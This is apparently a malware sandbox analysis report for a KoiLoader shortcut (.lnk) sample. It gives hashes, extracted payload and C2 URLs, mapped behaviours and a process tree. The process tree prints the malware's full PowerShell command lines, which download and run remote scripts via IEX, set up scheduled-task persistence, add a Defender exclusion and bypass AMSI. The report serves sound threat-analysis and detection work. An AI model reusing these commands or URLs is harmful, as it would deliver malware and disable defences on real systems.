Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
574s -
max time network
572s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 08:28
Static task
static1
Behavioral task
behavioral1
Sample
7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk
Resource
win10v2004-20250217-en
General
-
Target
7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk
-
Size
1KB
-
MD5
4faa35703e3c7a20143562b271ceca2f
-
SHA1
2d87ff75eb532029ab63ed68971471589f28a847
-
SHA256
7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926
-
SHA512
ab0659b71b2a6593a288d1fe869f3615dea4eb3684df62670f1bfb38b342a8a529fa933ee78743aa162d474ffaad7b9e381f6c3186d2bed798fb27f3bfa09133
Malware Config
Extracted
https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php
Extracted
https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php
https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1
Extracted
koiloader
http://178.17.170.209/overglass.php
-
payload_url
https://www.centralelatterieti.com/wp-content/uploads/2020
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral2/memory/2252-56-0x0000000007E70000-0x0000000007E7D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 12 IoCs
flow pid Process 8 1100 powershell.exe 58 2252 powershell.exe 59 2252 powershell.exe 61 4612 powershell.exe 62 4612 powershell.exe 72 2252 powershell.exe 73 2252 powershell.exe 74 2252 powershell.exe 78 2252 powershell.exe 80 2252 powershell.exe 81 2252 powershell.exe 82 2252 powershell.exe -
pid Process 2252 powershell.exe 1100 powershell.exe 4772 powershell.exe 4612 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4892 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4916 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 1100 powershell.exe 1100 powershell.exe 4892 powershell.exe 4892 powershell.exe 4892 powershell.exe 2252 powershell.exe 2252 powershell.exe 4772 powershell.exe 4772 powershell.exe 4772 powershell.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 2252 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 3444 wrote to memory of 1100 3444 cmd.exe 86 PID 3444 wrote to memory of 1100 3444 cmd.exe 86 PID 1100 wrote to memory of 4916 1100 powershell.exe 92 PID 1100 wrote to memory of 4916 1100 powershell.exe 92 PID 4192 wrote to memory of 4892 4192 wscript.EXE 108 PID 4192 wrote to memory of 4892 4192 wscript.EXE 108 PID 4892 wrote to memory of 4240 4892 powershell.exe 110 PID 4892 wrote to memory of 4240 4892 powershell.exe 110 PID 4892 wrote to memory of 3068 4892 powershell.exe 111 PID 4892 wrote to memory of 3068 4892 powershell.exe 111 PID 3068 wrote to memory of 2252 3068 wscript.exe 112 PID 3068 wrote to memory of 2252 3068 wscript.exe 112 PID 3068 wrote to memory of 2252 3068 wscript.exe 112 PID 2076 wrote to memory of 4212 2076 DllHost.exe 119 PID 2076 wrote to memory of 4212 2076 DllHost.exe 119 PID 2076 wrote to memory of 4212 2076 DllHost.exe 119 PID 4212 wrote to memory of 4772 4212 cmd.exe 121 PID 4212 wrote to memory of 4772 4212 cmd.exe 121 PID 4212 wrote to memory of 4772 4212 cmd.exe 121 PID 2252 wrote to memory of 2652 2252 powershell.exe 122 PID 2252 wrote to memory of 2652 2252 powershell.exe 122 PID 2252 wrote to memory of 2652 2252 powershell.exe 122 PID 2652 wrote to memory of 4612 2652 cmd.exe 124 PID 2652 wrote to memory of 4612 2652 cmd.exe 124 PID 2652 wrote to memory of 4612 2652 cmd.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\7d7319a069e4ce6453f554bd52c6103db586c3615e8f1bbc59748b11b2c9a926.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('778ycf5h9kz2sm.js iagx9x77v'); $dwnf='Dow'+'nl'+'oadF'+'ile'; $b10frxwtardxmxv8j = New-Object Net.WebClient; $wsd = $b10frxwtardxmxv8j.DownloadString('https://www.centralelatterieti.com/wp-content/uploads/2020/obviation3S0.php'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/commendedtz4.php', '778ycf5h9kz2sm.js'); $b10frxwtardxmxv8j.$dwnf('https://www.centralelatterieti.com/wp-content/uploads/2020/caninusAXRu.php', 'iagx9x77v.js'); . ('scht'+'as'+'ks') /create /sc minute /mo 1 /f /tr ($wsd + $pdw) /tn iagx9x77v;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v" /tn iagx9x77v3⤵
- Scheduled Task/Job: Scheduled Task
PID:4916
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\778ycf5h9kz2sm.js iagx9x77v1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "schtasks /delete /tn iagx9x77v /f; wscript $env:programdata\iagx9x77v.js "2⤵
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4892 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn iagx9x77v /f3⤵PID:4240
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\iagx9x77v.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$tp=[Ref].Assembly.GetTypes();$ppa = 'https://www.centralelatterieti.com/wp-content/uploads/2020/dazementxdy7.php'; $dnl = $null; $ppb = 'https://www.centralelatterieti.com/wp-content/uploads/2020/subgularExtK.ps1'; Foreach($tt in $tp) {if ($tt.Name -like '*m?iUt*s') {$c=$tt}}; $env:paths = '7zDZHF5BAPAF'; IEX(Invoke-WebRequest -UseBasicParsing $ppa); IEX(Invoke-WebRequest -UseBasicParsing $ppb)"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://www.centralelatterieti.com/wp-content/uploads/2020/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:4328
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:3124
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:2132
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:3692
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:2416
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:496
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:4244
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:1888
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\r54ce9d30-8a1e-4751-a619-b7b25aad0faer.js"1⤵PID:4708
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD5af9f1f2076317c03e21d56367e638af4
SHA161c4f850591f851acd3108104ef14f0fe32f95a6
SHA25670835a8f7ea6c93942935a6f9fef1ae4591c22e873e3b06000ef01437f2090c1
SHA512c280492024a902e3988c88dca7e21fc622df1bdf66796d9baf06a3b393550ac3d771589b0c51e7c246991d314c0729e7631cd1c08ba575683d9abdef7295b29c
-
Filesize
1KB
MD5ebb123c6a1353433349dbadfb05904cf
SHA1a3e08bc23bca1cf47a298f3e28cd2c59a7f8a49f
SHA256432ade0df36cd198d631114877eb69dbbf4e2a273c29cbbfc225943c32bf0e98
SHA5125e42b9b39191571920f3b69039f578724bb430033fea30c1735835307a18c6b35b7435474b193540e3124c9ef9dbb191c7d5ee03f958ac6ecbbae8194791664e
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
1KB
MD5bc8daa62f50771d68b9496656718c281
SHA17740eab59923d241d547813ac1456d5156e21969
SHA256c868cf713934c6173a94a78f16afa7eabe74b9c5968ec07f179794974f93497f
SHA512b700050ac573e804710876bb88ecb0235c9fee67b21e670e91620685ab4bd52b7aaf390e61c1f814adcceb2d95bdbdaa8240a4a2bdf04036470c0db22a264f6d
-
Filesize
1KB
MD52b856bda56945fa7252034b16c0189f0
SHA1df2d4ff8394cc57a8c399bfb5602679bfdcde06b
SHA256ffc29461bd43b0ffffa1c06c260f5089cce205cab26a1a1032b924272b718205
SHA5128843b6d91163d345e2aded8143d941388852ed3d4aa39ced89a3cf8a50bb908681624a7008c0b82359736cc3222f7908a1c34442028491921d243c0581aeb3e9
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82